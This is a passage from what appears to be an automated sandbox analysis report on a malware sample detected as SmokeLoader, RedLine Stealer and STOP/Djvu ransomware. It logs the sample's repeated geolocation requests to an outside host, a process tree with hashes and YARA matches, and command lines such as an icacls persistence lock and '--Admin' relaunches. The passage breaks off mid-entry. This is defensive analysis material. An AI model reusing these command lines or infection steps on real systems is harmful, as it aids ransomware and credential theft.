4	192.168.2.3	49710	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:47 UTC	205	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:47 UTC	205	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:47 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:47 UTC	205	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49711	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:47 UTC	206	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:47 UTC	206	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:47 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:47 UTC	206	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49713	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:48 UTC	207	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:48 UTC	207	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:48 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:48 UTC	208	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49715	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:49 UTC	208	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:49 UTC	208	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:49 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:49 UTC	209	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49716	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:53 UTC	209	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:53 UTC	209	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:53 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:53 UTC	210	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49720	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\759F.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-21 02:27:56 UTC	210	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-06-21 02:27:56 UTC	211	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 21 Jun 2023 02:27:56 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-06-21 02:27:56 UTC	211	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 7328, Parent PID: 3452

General

Target ID:	0
Start time:	04:26:57
Start date:	21/06/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	207872 bytes
MD5 hash:	22DB1211AD126909ED458BAA3BC4C424
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.379855236.0000000002161000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.379710237.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.379758047.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.379724310.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 7328

General

Target ID:	1
Start time:	04:27:02
Start date:	21/06/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rrjthgjPID: 7616, Parent PID: 1080

General

Target ID:	4
Start time:	04:27:36
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Roaming\rrjthgj
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rrjthgj
Imagebase:	0x400000
File size:	207872 bytes
MD5 hash:	22DB1211AD126909ED458BAA3BC4C424
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.450171034.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.450322842.0000000002021000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.449916655.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.449569254.0000000000650000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7636, Parent PID: 3452

General

Target ID:	5
Start time:	04:27:37
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\759F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\759F.exe
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.441041476.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.440951446.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7656, Parent PID: 7636

General

Target ID:	6
Start time:	04:27:38
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\759F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\759F.exe
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.449394401.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: icacls.exePID: 7716, Parent PID: 7656

General

Target ID:	7
Start time:	04:27:40
Start date:	21/06/2023
Path:	C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):	true
Commandline:	icacls "C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Imagebase:	0xb10000
File size:	29696 bytes
MD5 hash:	FF0D1D4317A44C951240FAE75075D501
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7744, Parent PID: 1080

General

Target ID:	8
Start time:	04:27:40
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe --Task
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.499761929.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.500232401.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 6C74.exePID: 7764, Parent PID: 3452

General

Target ID:	10
Start time:	04:27:40
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\6C74.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6C74.exe
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.448327047.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.448562068.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: dllhost.exePID: 7804, Parent PID: 800

General

Target ID:	11
Start time:	04:27:41
Start date:	21/06/2023
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
Imagebase:	0x7ff769260000
File size:	20888 bytes
MD5 hash:	2528137C6745C4EADD87817A1909677E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: 6C74.exePID: 7824, Parent PID: 7764

General

Target ID:	12
Start time:	04:27:41
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\6C74.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6C74.exe
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.456725641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7864, Parent PID: 7744

General

Target ID:	14
Start time:	04:27:41
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\fad265ce-e1cd-4fe2-9ebe-609c8ace8e33\759F.exe --Task
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000E.00000002.501769020.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7972, Parent PID: 7656

General

Target ID:	16
Start time:	04:27:42
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\759F.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\759F.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.452052947.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.452421978.0000000002250000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: 759F.exePID: 7992, Parent PID: 7972

General

Target ID:	17
Start time:	04:27:42
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\759F.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\759F.exe" --Admin IsNotAutoStart IsNotTask
Imagebase:	0x400000
File size:	796672 bytes
MD5 hash:	836FDB5D06415C4815B4962D5C5316A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.455189510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: consent.exePID: 8064, Parent PID: 4776

General

Target ID:	18
Start time:	04:27:44
Start date:	21/06/2023
Path:	C:\Windows\System32\consent.exe
Wow64 process (32bit):	false
Commandline:	consent.exe 4776 442 0000022BAEE1B7D0
Imagebase:	0x7ff784730000
File size:	157080 bytes
MD5 hash:	74D31E4F51873160D91B1F80E0C472D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: C2B9.exePID: 8124, Parent PID: 3452

General

Target ID:	19
Start time:	04:27:44
Start date:	21/06/2023
Path:	C:\Users\user\AppData\Local\Temp\C2B9.exe
Wow64 process (32bit):	true
